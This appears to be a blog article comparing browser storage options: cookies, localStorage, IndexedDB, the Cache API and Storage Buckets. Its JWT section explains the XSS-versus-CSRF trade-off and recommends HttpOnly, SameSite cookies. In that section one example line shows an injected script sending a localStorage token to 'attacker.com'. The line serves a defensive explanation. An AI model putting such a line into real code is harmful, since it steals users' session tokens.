A comprehensive deep dive into client-side storage. From Cookies to IndexedDB and the Cache API. We explore security best practices for JWT storage (XSS vs CSRF), performance implications of synchronous APIs, and how to build offline-first applications using Service Workers.
Establishing TCP connection is expensive. Reuse it for multiple requests.
Tired of naming classes? Writing CSS directly inside HTML sounds ugly, but it became the world standard. Why?
HTTP is Walkie-Talkie (Over). WebSocket is Phone (Hello). The secret tech behind Chat and Stock Charts.
For visually impaired, for keyboard users, and for your future self. Small `alt` tag makes a big difference.
In the early days of the web, everything was stateless. The server had no memory of who you were or what you did on the previous page. Then came Cookies, small text files that allowed servers to tag browsers like cattle. "This is User #1234." But cookies were small (4KB) and slow because they travelled with every HTTP request.
As web applications grew into monsters like Gmail and Figma, we needed more power. We needed to store user preferences, unsaved drafts, cached images, and even entire databases inside the browser. This led to the "Storage Wars": Web Storage (Local/Session), Web SQL (RIP), IndexedDB, and the modern Cache API.
Today, browsers are not just document viewers; they are operating systems with their own file systems and databases. Let's compare the four titans of browser storage.
Cookies are the grandfathers of web storage. They are primarily designed for Server-Client Communication, not client-side storage.
Expires).Cookie header of every HTTP request to the domain.HttpOnly (blocks JS access), Secure (HTTPS only), SameSite (CSRF protection).Introduced in HTML5 to replace cookies for storing data that doesn't need to go to the server. It's a simple Key-Value store.
localStorage: Forever (until cleared by JS or user).sessionStorage: Until the tab is closed.localStorage.getItem() is synchronous. It blocks the main thread.A full-blown, transactional NoSQL database embedded in the browser.
Part of the Service Worker specification, but accessible from the window too.
The most common question in frontend interviews: "Where should I store my JWT Access Token?" This is a battle between two vulnerabilities: XSS (Cross-Site Scripting) vs CSRF (Cross-Site Request Forgery).
Authorization: Bearer header. Not vulnerable to CSRF because JS code must explicitly attach the token.fetch('attacker.com', { body: localStorage.getItem('token') }) and steal your identity instantly.HttpOnly flag, JavaScript cannot read the cookie. Even if XSS happens, the attacker cannot steal the token string itself.SameSite=Strict or SameSite=Lax attribute, which largely mitigates CSRF. Anti-CSRF tokens in forms are also a standard defense.HttpOnly Cookies are generally considered safer for high-value authentication tokens because XSS is much harder to fully prevent than CSRF.
Many developers fear IndexedDB because its native API is famously verbose and complex ("Callback Hell"). However, libraries like idb (by Google) or Dexie.js make it as easy as using LocalStorage.
JSON.stringify(). You can store Dates, Blobs (Images/Files), and TypedArrays directly.// Dexie.js Example: A simple DB
const db = new Dexie('FriendDatabase');
db.version(1).stores({
friends: '++id, name, age' // Primary key and indexed props
});
// Adding data
await db.friends.add({ name: "Joseph", age: 21 });
// Querying data
const youngFriends = await db.friends
.where('age').below(25)
.toArray();
The Cache API enables PWA (Progressive Web Apps) to work offline. But how you usage it depends on your data.
"Check cache. If found, return it. If not, fetch from web."
"Try to fetch from web. If successful, update cache and return. If offline, return cache."
"Return the cached version immediately (speed!), but also fetch the new version in the background and update the cache for next time."
The web platform is evolving.
Previously, web apps couldn't touch your hard drive for security reasons. Now, with user permission, a web app (like VS Code Web or Photoshop Web) can open a file handle to a real file on your desktop, and save changes directly to it. This makes the browser a true OS-level application platform.
Browsers traditionally group all storage by Origin (https://example.com). If disk space is low, the browser might wipe everything for that origin.
Storage Buckets allow developers to segment data:
navigator.storage.estimate(): Check how much quota you have left.navigator.storage.persist() to request that the browser not clear your data under pressure.| Feature | Cookie | LocalStorage | IndexedDB | Cache API |
|---|---|---|---|---|
| Capacity | 4KB | 5-10MB | GBs | GBs |
| Data Type | String | String | Objects/Binary | Requests |
| Sync/Async | Sync | Sync (Blocker) | Async | Async |
| Server Tx | YES | No | No | No |
| Best For | Auth Tokens | Settings | Data/Offline | Assets |
Choose the right tool for the job. Don't put JWTs in LocalStorage, and don't put your database in Cookies. The browser is your oyster—store responsibly!